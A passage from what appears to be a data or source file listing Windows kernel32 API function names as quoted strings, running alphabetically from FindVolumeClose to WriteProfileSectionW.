"FindVolumeClose", "FindVolumeMountPointClose", "FlsAlloc", "FlsFree", "FlsGetValue", "FlsSetValue", "FlushConsoleInputBuffer", "FlushFileBuffers", "FlushInstructionCache", "FlushProcessWriteBuffers", "FlushViewOfFile", "FoldStringA", "FoldStringW", "FormatApplicationUserModelId", "FormatMessageA", "FormatMessageW", "FreeConsole", "FreeEnvironmentStringsA", "FreeEnvironmentStringsW", "FreeLibrary", "FreeLibraryAndExitThread", "FreeLibraryWhenCallbackReturns", "FreeMemoryJobObject", "FreeResource", "FreeUserPhysicalPages", "GenerateConsoleCtrlEvent", "GetACP", "GetActiveProcessorCount", "GetActiveProcessorGroupCount", "GetAppContainerAce", "GetAppContainerNamedObjectPath", "GetApplicationRecoveryCallback", "GetApplicationRecoveryCallbackWorker", "GetApplicationRestartSettings", "GetApplicationRestartSettingsWorker", "GetApplicationUserModelId", "GetAtomNameA", "GetAtomNameW", "GetBinaryType", "GetBinaryTypeA", "GetBinaryTypeW", "GetCPInfo", "GetCPInfoExA", "GetCPInfoExW", "GetCachedSigningLevel", "GetCalendarDateFormat", "GetCalendarDateFormatEx", "GetCalendarDaysInMonth", "GetCalendarDifferenceInDays", "GetCalendarInfoA", "GetCalendarInfoEx", "GetCalendarInfoW", "GetCalendarMonthsInYear", "GetCalendarSupportedDateRange", "GetCalendarWeekNumber", "GetComPlusPackageInstallStatus", "GetCommConfig", "GetCommMask", "GetCommModemStatus", "GetCommProperties", "GetCommState", "GetCommTimeouts", "GetCommandLineA", "GetCommandLineW", "GetCompressedFileSizeA", "GetCompressedFileSizeTransactedA", "GetCompressedFileSizeTransactedW", "GetCompressedFileSizeW", "GetComputerNameA", "GetComputerNameExA", "GetComputerNameExW", "GetComputerNameW", "GetConsoleAliasA", "GetConsoleAliasExesA", "GetConsoleAliasExesLengthA", "GetConsoleAliasExesLengthW", "GetConsoleAliasExesW", "GetConsoleAliasW", "GetConsoleAliasesA", "GetConsoleAliasesLengthA", "GetConsoleAliasesLengthW", "GetConsoleAliasesW", "GetConsoleCP", "GetConsoleCharType", "GetConsoleCommandHistoryA", "GetConsoleCommandHistoryLengthA", "GetConsoleCommandHistoryLengthW", "GetConsoleCommandHistoryW", "GetConsoleCursorInfo", "GetConsoleCursorMode", "GetConsoleDisplayMode", "GetConsoleFontInfo", "GetConsoleFontSize", "GetConsoleHardwareState", "GetConsoleHistoryInfo", "GetConsoleInputExeNameA", "GetConsoleInputExeNameW", "GetConsoleInputWaitHandle", "GetConsoleKeyboardLayoutNameA", "GetConsoleKeyboardLayoutNameW", "GetConsoleMode", "GetConsoleNlsMode", "GetConsoleOriginalTitleA", "GetConsoleOriginalTitleW", "GetConsoleOutputCP", "GetConsoleProcessList", "GetConsoleScreenBufferInfo", "GetConsoleScreenBufferInfoEx", "GetConsoleSelectionInfo", "GetConsoleTitleA", "GetConsoleTitleW", "GetConsoleWindow", "GetCurrencyFormatA", "GetCurrencyFormatEx", "GetCurrencyFormatW", "GetCurrentActCtx", "GetCurrentActCtxWorker", "GetCurrentApplicationUserModelId", "GetCurrentConsoleFont", "GetCurrentConsoleFontEx", "GetCurrentDirectoryA", "GetCurrentDirectoryW", "GetCurrentPackageFamilyName", "GetCurrentPackageFullName", "GetCurrentPackageId", "GetCurrentPackageInfo", "GetCurrentPackagePath", "GetCurrentProcess", "GetCurrentProcessId", "GetCurrentProcessorNumber", "GetCurrentProcessorNumberEx", "GetCurrentThread", "GetCurrentThreadId", "GetCurrentThreadStackLimits", "GetCurrentUmsThread", "GetDateFormatA", "GetDateFormatAWorker", "GetDateFormatEx", "GetDateFormatW", "GetDateFormatWWorker", "GetDefaultCommConfigA", "GetDefaultCommConfigW", "GetDevicePowerState", "GetDiskFreeSpaceA", "GetDiskFreeSpaceExA", "GetDiskFreeSpaceExW", "GetDiskFreeSpaceW", "GetDiskSpaceInformationA", "GetDiskSpaceInformationW", "GetDllDirectoryA", "GetDllDirectoryW", "GetDriveTypeA", "GetDriveTypeW", "GetDurationFormat", "GetDurationFormatEx", "GetDynamicTimeZoneInformation", "GetEnabledXStateFeatures", "GetEncryptedFileVersionExt", "GetEnvironmentStrings", "GetEnvironmentStringsA", "GetEnvironmentStringsW", "GetEnvironmentVariableA", "GetEnvironmentVariableW", "GetEraNameCountedString", "GetErrorMode", "GetExitCodeProcess", "GetExitCodeThread", "GetExpandedNameA", "GetExpandedNameW", "GetFileAttributesA", "GetFileAttributesExA", "GetFileAttributesExW", "GetFileAttributesTransactedA", "GetFileAttributesTransactedW", "GetFileAttributesW", "GetFileBandwidthReservation", "GetFileInformationByHandle", "GetFileInformationByHandleEx", "GetFileMUIInfo", "GetFileMUIPath", "GetFileSize", "GetFileSizeEx", "GetFileTime", "GetFileType", "GetFinalPathNameByHandleA", "GetFinalPathNameByHandleW", "GetFirmwareEnvironmentVariableA", "GetFirmwareEnvironmentVariableExA", "GetFirmwareEnvironmentVariableExW", "GetFirmwareEnvironmentVariableW", "GetFirmwareType", "GetFullPathNameA", "GetFullPathNameTransactedA", "GetFullPathNameTransactedW", "GetFullPathNameW", "GetGeoInfoA", "GetGeoInfoEx", "GetGeoInfoW", "GetHandleInformation", "GetLargePageMinimum", "GetLargestConsoleWindowSize", "GetLastError", "GetLocalTime", "GetLocaleInfoA", "GetLocaleInfoEx", "GetLocaleInfoW", "GetLogicalDriveStringsA", "GetLogicalDriveStringsW", "GetLogicalDrives", "GetLogicalProcessorInformation", "GetLogicalProcessorInformationEx", "GetLongPathNameA", "GetLongPathNameTransactedA", "GetLongPathNameTransactedW", "GetLongPathNameW", "GetMailslotInfo", "GetMaximumProcessorCount", "GetMaximumProcessorGroupCount", "GetMemoryErrorHandlingCapabilities", "GetModuleFileNameA", "GetModuleFileNameW", "GetModuleHandleA", "GetModuleHandleExA", "GetModuleHandleExW", "GetModuleHandleW", "GetNLSVersion", "GetNLSVersionEx", "GetNamedPipeAttribute", "GetNamedPipeClientComputerNameA", "GetNamedPipeClientComputerNameW", "GetNamedPipeClientProcessId", "GetNamedPipeClientSessionId", "GetNamedPipeHandleStateA", "GetNamedPipeHandleStateW", "GetNamedPipeInfo", "GetNamedPipeServerProcessId", "GetNamedPipeServerSessionId", "GetNativeSystemInfo", "GetNextUmsListItem", "GetNextVDMCommand", "GetNumaAvailableMemoryNode", "GetNumaAvailableMemoryNodeEx", "GetNumaHighestNodeNumber", "GetNumaNodeNumberFromHandle", "GetNumaNodeProcessorMask", "GetNumaNodeProcessorMaskEx", "GetNumaProcessorNode", "GetNumaProcessorNodeEx", "GetNumaProximityNode", "GetNumaProximityNodeEx", "GetNumberFormatA", "GetNumberFormatEx", "GetNumberFormatW", "GetNumberOfConsoleFonts", "GetNumberOfConsoleInputEvents", "GetNumberOfConsoleMouseButtons", "GetOEMCP", "GetOverlappedResult", "GetOverlappedResultEx", "GetPackageApplicationIds", "GetPackageFamilyName", "GetPackageFullName", "GetPackageId", "GetPackageInfo", "GetPackagePath", "GetPackagePathByFullName", "GetPackagesByPackageFamily", "GetPhysicallyInstalledSystemMemory", "GetPriorityClass", "GetPrivateProfileIntA", "GetPrivateProfileIntW", "GetPrivateProfileSectionA", "GetPrivateProfileSectionNamesA", "GetPrivateProfileSectionNamesW", "GetPrivateProfileSectionW", "GetPrivateProfileStringA", "GetPrivateProfileStringW", "GetPrivateProfileStructA", "GetPrivateProfileStructW", "GetProcAddress", "GetProcessAffinityMask", "GetProcessDEPPolicy", "GetProcessDefaultCpuSets", "GetProcessGroupAffinity", "GetProcessHandleCount", "GetProcessHeap", "GetProcessHeaps", "GetProcessId", "GetProcessIdOfThread", "GetProcessInformation", "GetProcessIoCounters", "GetProcessMitigationPolicy", "GetProcessPreferredUILanguages", "GetProcessPriorityBoost", "GetProcessShutdownParameters", "GetProcessTimes", "GetProcessVersion", "GetProcessWorkingSetSize", "GetProcessWorkingSetSizeEx", "GetProcessorSystemCycleTime", "GetProductInfo", "GetProfileIntA", "GetProfileIntW", "GetProfileSectionA", "GetProfileSectionW", "GetProfileStringA", "GetProfileStringW", "GetQueuedCompletionStatus", "GetQueuedCompletionStatusEx", "GetShortPathNameA", "GetShortPathNameW", "GetStagedPackagePathByFullName", "GetStartupInfoA", "GetStartupInfoW", "GetStateFolder", "GetStdHandle", "GetStringScripts", "GetStringTypeA", "GetStringTypeExA", "GetStringTypeExW", "GetStringTypeW", "GetSystemAppDataKey", "GetSystemCpuSetInformation", "GetSystemDEPPolicy", "GetSystemDefaultLCID", "GetSystemDefaultLangID", "GetSystemDefaultLocaleName", "GetSystemDefaultUILanguage", "GetSystemDirectoryA", "GetSystemDirectoryW", "GetSystemFileCacheSize", "GetSystemFirmwareTable", "GetSystemInfo", "GetSystemPowerStatus", "GetSystemPreferredUILanguages", "GetSystemRegistryQuota", "GetSystemTime", "GetSystemTimeAdjustment", "GetSystemTimeAsFileTime", "GetSystemTimePreciseAsFileTime", "GetSystemTimes", "GetSystemWindowsDirectoryA", "GetSystemWindowsDirectoryW", "GetSystemWow64DirectoryA", "GetSystemWow64DirectoryW", "GetTapeParameters", "GetTapePosition", "GetTapeStatus", "GetTempFileNameA", "GetTempFileNameW", "GetTempPathA", "GetTempPathW", "GetThreadContext", "GetThreadDescription", "GetThreadErrorMode", "GetThreadGroupAffinity", "GetThreadIOPendingFlag", "GetThreadId", "GetThreadIdealProcessorEx", "GetThreadInformation", "GetThreadLocale", "GetThreadPreferredUILanguages", "GetThreadPriority", "GetThreadPriorityBoost", "GetThreadSelectedCpuSets", "GetThreadSelectorEntry", "GetThreadTimes", "GetThreadUILanguage", "GetTickCount", "GetTickCount64", "GetTimeFormatA", "GetTimeFormatAWorker", "GetTimeFormatEx", "GetTimeFormatW", "GetTimeFormatWWorker", "GetTimeZoneInformation", "GetTimeZoneInformationForYear", "GetUILanguageInfo", "GetUmsCompletionListEvent", "GetUmsSystemThreadInformation", "GetUserDefaultGeoName", "GetUserDefaultLCID", "GetUserDefaultLangID", "GetUserDefaultLocaleName", "GetUserDefaultUILanguage", "GetUserGeoID", "GetUserPreferredUILanguages", "GetVDMCurrentDirectories", "GetVersion", "GetVersionExA", "GetVersionExW", "GetVolumeInformationA", "GetVolumeInformationByHandleW", "GetVolumeInformationW", "GetVolumeNameForVolumeMountPointA", "GetVolumeNameForVolumeMountPointW", "GetVolumePathNameA", "GetVolumePathNameW", "GetVolumePathNamesForVolumeNameA", "GetVolumePathNamesForVolumeNameW", "GetWindowsDirectoryA", "GetWindowsDirectoryW", "GetWriteWatch", "GetXStateFeaturesMask", "GlobalAddAtomA", "GlobalAddAtomExA", "GlobalAddAtomExW", "GlobalAddAtomW", "GlobalAlloc", "GlobalCompact", "GlobalDeleteAtom", "GlobalFindAtomA", "GlobalFindAtomW", "GlobalFix", "GlobalFlags", "GlobalFree", "GlobalGetAtomNameA", "GlobalGetAtomNameW", "GlobalHandle", "GlobalLock", "GlobalMemoryStatus", "GlobalMemoryStatusEx", "GlobalReAlloc", "GlobalSize", "GlobalUnWire", "GlobalUnfix", "GlobalUnlock", "GlobalWire", "Heap32First", "Heap32ListFirst", "Heap32ListNext", "Heap32Next", "HeapAlloc", "HeapCompact", "HeapCreate", "HeapDestroy", "HeapFree", "HeapLock", "HeapQueryInformation", "HeapReAlloc", "HeapSetInformation", "HeapSize", "HeapSummary", "HeapUnlock", "HeapValidate", "HeapWalk", "IdnToAscii", "IdnToNameprepUnicode", "IdnToUnicode", "InitAtomTable", "InitOnceBeginInitialize", "InitOnceComplete", "InitOnceExecuteOnce", "InitOnceInitialize", "InitializeConditionVariable", "InitializeContext", "InitializeContext2", "InitializeCriticalSection", "InitializeCriticalSectionAndSpinCount", "InitializeCriticalSectionEx", "InitializeEnclave", "InitializeProcThreadAttributeList", "InitializeSListHead", "InitializeSRWLock", "InitializeSynchronizationBarrier", "InstallELAMCertificateInfo", "InterlockedFlushSList", "InterlockedPopEntrySList", "InterlockedPushEntrySList", "InterlockedPushListSList", "InterlockedPushListSListEx", "InvalidateConsoleDIBits", "IsBadCodePtr", "IsBadHugeReadPtr", "IsBadHugeWritePtr", "IsBadReadPtr", "IsBadStringPtrA", "IsBadStringPtrW", "IsBadWritePtr", "IsCalendarLeapDay", "IsCalendarLeapMonth", "IsCalendarLeapYear", "IsDBCSLeadByte", "IsDBCSLeadByteEx", "IsDebuggerPresent", "IsEnclaveTypeSupported", "IsNLSDefinedString", "IsNativeVhdBoot", "IsNormalizedString", "IsProcessCritical", "IsProcessInJob", "IsProcessorFeaturePresent", "IsSystemResumeAutomatic", "IsThreadAFiber", "IsThreadpoolTimerSet", "IsUserCetAvailableInEnvironment", "IsValidCalDateTime", "IsValidCodePage", "IsValidLanguageGroup", "IsValidLocale", "IsValidLocaleName", "IsValidNLSVersion", "IsWow64GuestMachineSupported", "IsWow64Process", "IsWow64Process2", "K32EmptyWorkingSet", "K32EnumDeviceDrivers", "K32EnumPageFilesA", "K32EnumPageFilesW", "K32EnumProcessModules", "K32EnumProcessModulesEx", "K32EnumProcesses", "K32GetDeviceDriverBaseNameA", "K32GetDeviceDriverBaseNameW", "K32GetDeviceDriverFileNameA", "K32GetDeviceDriverFileNameW", "K32GetMappedFileNameA", "K32GetMappedFileNameW", "K32GetModuleBaseNameA", "K32GetModuleBaseNameW", "K32GetModuleFileNameExA", "K32GetModuleFileNameExW", "K32GetModuleInformation", "K32GetPerformanceInfo", "K32GetProcessImageFileNameA", "K32GetProcessImageFileNameW", "K32GetProcessMemoryInfo", "K32GetWsChanges", "K32GetWsChangesEx", "K32InitializeProcessForWsWatch", "K32QueryWorkingSet", "K32QueryWorkingSetEx", "LCIDToLocaleName", "LCMapStringA", "LCMapStringEx", "LCMapStringW", "LZClose", "LZCloseFile", "LZCopy", "LZCreateFileW", "LZDone", "LZInit", "LZOpenFileA", "LZOpenFileW", "LZRead", "LZSeek", "LZStart", "LeaveCriticalSection", "LeaveCriticalSectionWhenCallbackReturns", "LoadAppInitDlls", "LoadEnclaveData", "LoadLibraryA", "LoadLibraryExA", "LoadLibraryExW", "LoadLibraryW", "LoadModule", "LoadPackagedLibrary", "LoadResource", "LoadStringBaseExW", "LoadStringBaseW", "LocalAlloc", "LocalCompact", "LocalFileTimeToFileTime", "LocalFileTimeToLocalSystemTime", "LocalFlags", "LocalFree", "LocalHandle", "LocalLock", "LocalReAlloc", "LocalShrink", "LocalSize", "LocalSystemTimeToLocalFileTime", "LocalUnlock", "LocaleNameToLCID", "LocateXStateFeature", "LockFile", "LockFileEx", "LockResource", "MapUserPhysicalPages", "MapUserPhysicalPagesScatter", "MapViewOfFile", "MapViewOfFileEx", "MapViewOfFileExNuma", "MapViewOfFileFromApp", "Module32First", "Module32FirstW", "Module32Next", "Module32NextW", "MoveFileA", "MoveFileExA", "MoveFileExW", "MoveFileTransactedA", "MoveFileTransactedW", "MoveFileW", "MoveFileWithProgressA", "MoveFileWithProgressW", "MulDiv", "MultiByteToWideChar", "NeedCurrentDirectoryForExePathA", "NeedCurrentDirectoryForExePathW", "NlsCheckPolicy", "NlsGetCacheUpdateCount", "NlsUpdateLocale", "NlsUpdateSystemLocale", "NormalizeString", "NotifyMountMgr", "NotifyUILanguageChange", "NtVdm64CreateProcessInternalW", "OOBEComplete", "OfferVirtualMemory", "OpenConsoleW", "OpenConsoleWStub", "OpenEventA", "OpenEventW", "OpenFile", "OpenFileById", "OpenFileMappingA", "OpenFileMappingW", "OpenJobObjectA", "OpenJobObjectW", "OpenMutexA", "OpenMutexW", "OpenPackageInfoByFullName", "OpenPrivateNamespaceA", "OpenPrivateNamespaceW", "OpenProcess", "OpenProcessToken", "OpenProfileUserMapping", "OpenSemaphoreA", "OpenSemaphoreW", "OpenState", "OpenStateExplicit", "OpenThread", "OpenThreadToken", "OpenWaitableTimerA", "OpenWaitableTimerW", "OutputDebugStringA", "OutputDebugStringW", "PackageFamilyNameFromFullName", "PackageFamilyNameFromId", "PackageFullNameFromId", "PackageIdFromFullName", "PackageNameAndPublisherIdFromFamilyName", "ParseApplicationUserModelId", "PeekConsoleInputA", "PeekConsoleInputW", "PeekNamedPipe", "PostQueuedCompletionStatus", "PowerClearRequest", "PowerCreateRequest", "PowerSetRequest", "PrefetchVirtualMemory", "PrepareTape", "PrivCopyFileExW", "PrivMoveFileIdentityW", "Process32First", "Process32FirstW", "Process32Next", "Process32NextW", "ProcessIdToSessionId", "PssCaptureSnapshot", "PssDuplicateSnapshot", "PssFreeSnapshot", "PssQuerySnapshot", "PssWalkMarkerCreate", "PssWalkMarkerFree", "PssWalkMarkerGetPosition", "PssWalkMarkerRewind", "PssWalkMarkerSeek", "PssWalkMarkerSeekToBeginning", "PssWalkMarkerSetPosition", "PssWalkMarkerTell", "PssWalkSnapshot", "PulseEvent", "PurgeComm", "QueryActCtxSettingsW", "QueryActCtxSettingsWWorker", "QueryActCtxW", "QueryActCtxWWorker", "QueryDepthSList", "QueryDosDeviceA", "QueryDosDeviceW", "QueryFullProcessImageNameA", "QueryFullProcessImageNameW", "QueryIdleProcessorCycleTime", "QueryIdleProcessorCycleTimeEx", "QueryInformationJobObject", "QueryIoRateControlInformationJobObject", "QueryMemoryResourceNotification", "QueryPerformanceCounter", "QueryPerformanceFrequency", "QueryProcessAffinityUpdateMode", "QueryProcessCycleTime", "QueryProtectedPolicy", "QueryThreadCycleTime", "QueryThreadProfiling", "QueryThreadpoolStackInformation", "QueryUmsThreadInformation", "QueryUnbiasedInterruptTime", "QueueUserAPC", "QueueUserAPC2", "QueueUserWorkItem", "QuirkGetData2Worker", "QuirkGetDataWorker", "QuirkIsEnabled2Worker", "QuirkIsEnabled3Worker", "QuirkIsEnabledForPackage2Worker", "QuirkIsEnabledForPackage3Worker", "QuirkIsEnabledForPackage4Worker", "QuirkIsEnabledForPackageWorker", "QuirkIsEnabledForProcessWorker", "QuirkIsEnabledWorker", "RaiseException", "RaiseFailFastException", "RaiseInvalid16BitExeError", "ReOpenFile", "ReadConsoleA", "ReadConsoleInputA", "ReadConsoleInputExA", "ReadConsoleInputExW", "ReadConsoleInputW", "ReadConsoleOutputA", "ReadConsoleOutputAttribute", "ReadConsoleOutputCharacterA", "ReadConsoleOutputCharacterW", "ReadConsoleOutputW", "ReadConsoleW", "ReadDirectoryChangesExW", "ReadDirectoryChangesW", "ReadFile", "ReadFileEx", "ReadFileScatter", "ReadProcessMemory", "ReadThreadProfilingData", "ReclaimVirtualMemory", "RegCloseKey", "RegCopyTreeW", "RegCreateKeyExA", "RegCreateKeyExW", "RegDeleteKeyExA", "RegDeleteKeyExW", "RegDeleteTreeA", "RegDeleteTreeW", "RegDeleteValueA", "RegDeleteValueW", "RegDisablePredefinedCacheEx", "RegEnumKeyExA", "RegEnumKeyExW", "RegEnumValueA", "RegEnumValueW", "RegFlushKey", "RegGetKeySecurity", "RegGetValueA", "RegGetValueW", "RegLoadKeyA", "RegLoadKeyW", "RegLoadMUIStringA", "RegLoadMUIStringW", "RegNotifyChangeKeyValue", "RegOpenCurrentUser", "RegOpenKeyExA", "RegOpenKeyExW", "RegOpenUserClassesRoot", "RegQueryInfoKeyA", "RegQueryInfoKeyW", "RegQueryValueExA", "RegQueryValueExW", "RegRestoreKeyA", "RegRestoreKeyW", "RegSaveKeyExA", "RegSaveKeyExW", "RegSetKeySecurity", "RegSetValueExA", "RegSetValueExW", "RegUnLoadKeyA", "RegUnLoadKeyW", "RegisterApplicationRecoveryCallback", "RegisterApplicationRestart", "RegisterBadMemoryNotification", "RegisterConsoleIME", "RegisterConsoleOS2", "RegisterConsoleVDM", "RegisterWaitForInputIdle", "RegisterWaitForSingleObject", "RegisterWaitForSingleObjectEx", "RegisterWaitUntilOOBECompleted", "RegisterWowBaseHandlers", "RegisterWowExec", "ReleaseActCtx", "ReleaseActCtxWorker", "ReleaseMutex", "ReleaseMutexWhenCallbackReturns", "ReleaseSRWLockExclusive", "ReleaseSRWLockShared", "ReleaseSemaphore", "ReleaseSemaphoreWhenCallbackReturns", "RemoveDirectoryA", "RemoveDirectoryTransactedA", "RemoveDirectoryTransactedW", "RemoveDirectoryW", "RemoveDllDirectory", "RemoveLocalAlternateComputerNameA", "RemoveLocalAlternateComputerNameW", "RemoveSecureMemoryCacheCallback", "RemoveVectoredContinueHandler", "RemoveVectoredExceptionHandler", "ReplaceFile", "ReplaceFileA", "ReplaceFileW", "ReplacePartitionUnit", "RequestDeviceWakeup", "RequestWakeupLatency", "ResetEvent", "ResetWriteWatch", "ResizePseudoConsole", "ResolveDelayLoadedAPI", "ResolveDelayLoadsFromDll", "ResolveLocaleName", "RestoreLastError", "ResumeThread", "RtlAddFunctionTable", "RtlCaptureContext", "RtlCaptureStackBackTrace", "RtlCompareMemory", "RtlCopyMemory", "RtlDeleteFunctionTable", "RtlFillMemory", "RtlInstallFunctionTableCallback", "RtlLookupFunctionEntry", "RtlMoveMemory", "RtlPcToFileHeader", "RtlRaiseException", "RtlRestoreContext", "RtlUnwind", "RtlUnwindEx", "RtlVirtualUnwind", "RtlZeroMemory", "ScrollConsoleScreenBufferA", "ScrollConsoleScreenBufferW", "SearchPathA", "SearchPathW", "SetCachedSigningLevel", "SetCalendarInfoA", "SetCalendarInfoW", "SetComPlusPackageInstallStatus", "SetCommBreak", "SetCommConfig", "SetCommMask", "SetCommState", "SetCommTimeouts", "SetComputerNameA", "SetComputerNameEx2W", "SetComputerNameExA", "SetComputerNameExW", "SetComputerNameW", "SetConsoleActiveScreenBuffer", "SetConsoleCP", "SetConsoleCtrlHandler", "SetConsoleCursor", "SetConsoleCursorInfo", "SetConsoleCursorMode", "SetConsoleCursorPosition", "SetConsoleDisplayMode", "SetConsoleFont", "SetConsoleHardwareState", "SetConsoleHistoryInfo", "SetConsoleIcon", "SetConsoleInputExeNameA", "SetConsoleInputExeNameW", "SetConsoleKeyShortcuts", "SetConsoleLocalEUDC", "SetConsoleMaximumWindowSize", "SetConsoleMenuClose", "SetConsoleMode", "SetConsoleNlsMode", "SetConsoleNumberOfCommandsA", "SetConsoleNumberOfCommandsW", "SetConsoleOS2OemFormat", "SetConsoleOutputCP", "SetConsolePalette", "SetConsoleScreenBufferInfoEx", "SetConsoleScreenBufferSize", "SetConsoleTextAttribute", "SetConsoleTitleA", "SetConsoleTitleW", "SetConsoleWindowInfo", "SetCriticalSectionSpinCount", "SetCurrentConsoleFontEx", "SetCurrentDirectoryA", "SetCurrentDirectoryW", "SetDefaultCommConfigA", "SetDefaultCommConfigW", "SetDefaultDllDirectories", "SetDllDirectoryA", "SetDllDirectoryW", "SetDynamicTimeZoneInformation", "SetEndOfFile", "SetEnvironmentStringsA", "SetEnvironmentStringsW", "SetEnvironmentVariableA", "SetEnvironmentVariableW", "SetErrorMode", "SetEvent", "SetEventWhenCallbackReturns", "SetFileApisToANSI", "SetFileApisToOEM", "SetFileAttributesA", "SetFileAttributesTransactedA", "SetFileAttributesTransactedW", "SetFileAttributesW", "SetFileBandwidthReservation", "SetFileCompletionNotificationModes", "SetFileInformationByHandle", "SetFileIoOverlappedRange", "SetFilePointer", "SetFilePointerEx", "SetFileShortNameA", "SetFileShortNameW", "SetFileTime", "SetFileValidData", "SetFirmwareEnvironmentVariableA", "SetFirmwareEnvironmentVariableExA", "SetFirmwareEnvironmentVariableExW", "SetFirmwareEnvironmentVariableW", "SetHandleCount", "SetHandleInformation", "SetInformationJobObject", "SetIoRateControlInformationJobObject", "SetLastConsoleEventActive", "SetLastError", "SetLocalPrimaryComputerNameA", "SetLocalPrimaryComputerNameW", "SetLocalTime", "SetLocaleInfoA", "SetLocaleInfoW", "SetMailslotInfo", "SetMessageWaitingIndicator", "SetNamedPipeAttribute", "SetNamedPipeHandleState", "SetPriorityClass", "SetProcessAffinityMask", "SetProcessAffinityUpdateMode", "SetProcessDEPPolicy", "SetProcessDefaultCpuSets", "SetProcessDynamicEHContinuationTargets", "SetProcessDynamicEnforcedCetCompatibleRanges", "SetProcessInformation", "SetProcessMitigationPolicy", "SetProcessPreferredUILanguages", "SetProcessPriorityBoost", "SetProcessShutdownParameters", "SetProcessWorkingSetSize", "SetProcessWorkingSetSizeEx", "SetProtectedPolicy", "SetSearchPathMode", "SetStdHandle", "SetStdHandleEx", "SetSystemFileCacheSize", "SetSystemPowerState", "SetSystemTime", "SetSystemTimeAdjustment", "SetTapeParameters", "SetTapePosition", "SetTermsrvAppInstallMode", "SetThreadAffinityMask", "SetThreadContext", "SetThreadDescription", "SetThreadErrorMode", "SetThreadExecutionState", "SetThreadGroupAffinity", "SetThreadIdealProcessor", "SetThreadIdealProcessorEx", "SetThreadInformation", "SetThreadLocale", "SetThreadPreferredUILanguages", "SetThreadPriority", "SetThreadPriorityBoost", "SetThreadSelectedCpuSets", "SetThreadStackGuarantee", "SetThreadToken", "SetThreadUILanguage", "SetThreadpoolStackInformation", "SetThreadpoolThreadMaximum", "SetThreadpoolThreadMinimum", "SetThreadpoolTimer", "SetThreadpoolTimerEx", "SetThreadpoolWait", "SetThreadpoolWaitEx", "SetTimeZoneInformation", "SetTimerQueueTimer", "SetUmsThreadInformation", "SetUnhandledExceptionFilter", "SetUserGeoID", "SetUserGeoName", "SetVDMCurrentDirectories", "SetVolumeLabelA", "SetVolumeLabelW", "SetVolumeMountPointA", "SetVolumeMountPointW", "SetVolumeMountPointWStub", "SetWaitableTimer", "SetWaitableTimerEx", "SetXStateFeaturesMask", "SetupComm", "ShowConsoleCursor", "SignalObjectAndWait", "SizeofResource", "Sleep", "SleepConditionVariableCS", "SleepConditionVariableSRW", "SleepEx", "SortCloseHandle", "SortGetHandle", "StartThreadpoolIo", "SubmitThreadpoolWork", "SuspendThread", "SwitchToFiber", "SwitchToThread", "SystemTimeToFileTime", "SystemTimeToTzSpecificLocalTime", "SystemTimeToTzSpecificLocalTimeEx", "TerminateJobObject", "TerminateProcess", "TerminateThread", "TermsrvAppInstallMode", "TermsrvConvertSysRootToUserDir", "TermsrvCreateRegEntry", "TermsrvDeleteKey", "TermsrvDeleteValue", "TermsrvGetPreSetValue", "TermsrvGetWindowsDirectoryA", "TermsrvGetWindowsDirectoryW", "TermsrvOpenRegEntry", "TermsrvOpenUserClasses", "TermsrvRestoreKey", "TermsrvSetKeySecurity", "TermsrvSetValueKey", "TermsrvSyncUserIniFileExt", "Thread32First", "Thread32Next", "TlsAlloc", "TlsFree", "TlsGetValue", "TlsSetValue", "Toolhelp32ReadProcessMemory", "TransactNamedPipe", "TransmitCommChar", "TryAcquireSRWLockExclusive", "TryAcquireSRWLockShared", "TryEnterCriticalSection", "TrySubmitThreadpoolCallback", "TzSpecificLocalTimeToSystemTime", "TzSpecificLocalTimeToSystemTimeEx", "UTRegister", "UTUnRegister", "UmsThreadYield", "UnhandledExceptionFilter", "UnlockFile", "UnlockFileEx", "UnmapViewOfFile", "UnmapViewOfFileEx", "UnregisterApplicationRecoveryCallback", "UnregisterApplicationRestart", "UnregisterBadMemoryNotification", "UnregisterConsoleIME", "UnregisterWait", "UnregisterWaitEx", "UnregisterWaitUntilOOBECompleted", "UpdateCalendarDayOfWeek", "UpdateProcThreadAttribute", "UpdateResourceA", "UpdateResourceW", "VDMConsoleOperation", "VDMOperationStarted", "VerLanguageNameA", "VerLanguageNameW", "VerSetConditionMask", "VerifyConsoleIoHandle", "VerifyScripts", "VerifyVersionInfoA", "VerifyVersionInfoW", "VirtualAlloc", "VirtualAllocEx", "VirtualAllocExNuma", "VirtualFree", "VirtualFreeEx", "VirtualLock", "VirtualProtect", "VirtualProtectEx", "VirtualQuery", "VirtualQueryEx", "VirtualUnlock", "WTSGetActiveConsoleSessionId", "WaitCommEvent", "WaitForDebugEvent", "WaitForDebugEventEx", "WaitForMultipleObjects", "WaitForMultipleObjectsEx", "WaitForSingleObject", "WaitForSingleObjectEx", "WaitForThreadpoolIoCallbacks", "WaitForThreadpoolTimerCallbacks", "WaitForThreadpoolWaitCallbacks", "WaitForThreadpoolWorkCallbacks", "WaitNamedPipeA", "WaitNamedPipeW", "WakeAllConditionVariable", "WakeConditionVariable", "WerGetFlags", "WerGetFlagsWorker", "WerRegisterAdditionalProcess", "WerRegisterAppLocalDump", "WerRegisterCustomMetadata", "WerRegisterExcludedMemoryBlock", "WerRegisterFile", "WerRegisterFileWorker", "WerRegisterMemoryBlock", "WerRegisterMemoryBlockWorker", "WerRegisterRuntimeExceptionModule", "WerRegisterRuntimeExceptionModuleWorker", "WerSetFlags", "WerSetFlagsWorker", "WerUnregisterAdditionalProcess", "WerUnregisterAppLocalDump", "WerUnregisterCustomMetadata", "WerUnregisterExcludedMemoryBlock", "WerUnregisterFile", "WerUnregisterFileWorker", "WerUnregisterMemoryBlock", "WerUnregisterMemoryBlockWorker", "WerUnregisterRuntimeExceptionModule", "WerUnregisterRuntimeExceptionModuleWorker", "WerpGetDebugger", "WerpInitiateRemoteRecovery", "WerpLaunchAeDebug", "WerpNotifyLoadStringResourceWorker", "WerpNotifyUseStringResourceWorker", "WideCharToMultiByte", "WinExec", "Wow64DisableWow64FsRedirection", "Wow64EnableWow64FsRedirection", "Wow64GetThreadContext", "Wow64GetThreadSelectorEntry", "Wow64RevertWow64FsRedirection", "Wow64SetThreadContext", "Wow64SuspendThread", "WriteConsoleA", "WriteConsoleInputA", "WriteConsoleInputVDMA", "WriteConsoleInputVDMW", "WriteConsoleInputW", "WriteConsoleOutputA", "WriteConsoleOutputAttribute", "WriteConsoleOutputCharacterA", "WriteConsoleOutputCharacterW", "WriteConsoleOutputW", "WriteConsoleW", "WriteFile", "WriteFileEx", "WriteFileGather", "WritePrivateProfileSectionA", "WritePrivateProfileSectionW", "WritePrivateProfileStringA", "WritePrivateProfileStringW", "WritePrivateProfileStructA", "WritePrivateProfileStructW", "WriteProcessMemory", "WriteProfileSectionA", "WriteProfileSectionW", 